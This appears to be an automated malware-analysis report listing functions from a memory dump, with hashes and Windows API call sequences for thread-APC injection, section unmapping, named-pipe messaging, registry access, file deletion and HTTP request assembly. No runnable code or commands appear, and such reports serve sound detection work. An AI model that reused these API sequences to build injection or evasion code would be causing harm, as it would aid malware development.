  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DDB79, Relevance: 24.2, APIs: 16, Instructions: 232 Total matches: 1memorystring
Similarity
  • Total matches: 1
  • API ID: HeapFree$GetTickCountRtlAllocateHeap$QueryPerformanceCounterQueryPerformanceFrequencyRtlEnterCriticalSectionRtlLeaveCriticalSectionStrTrim_aulldivlstrcpy
  • String ID:
  • API String ID: 2502196733-0
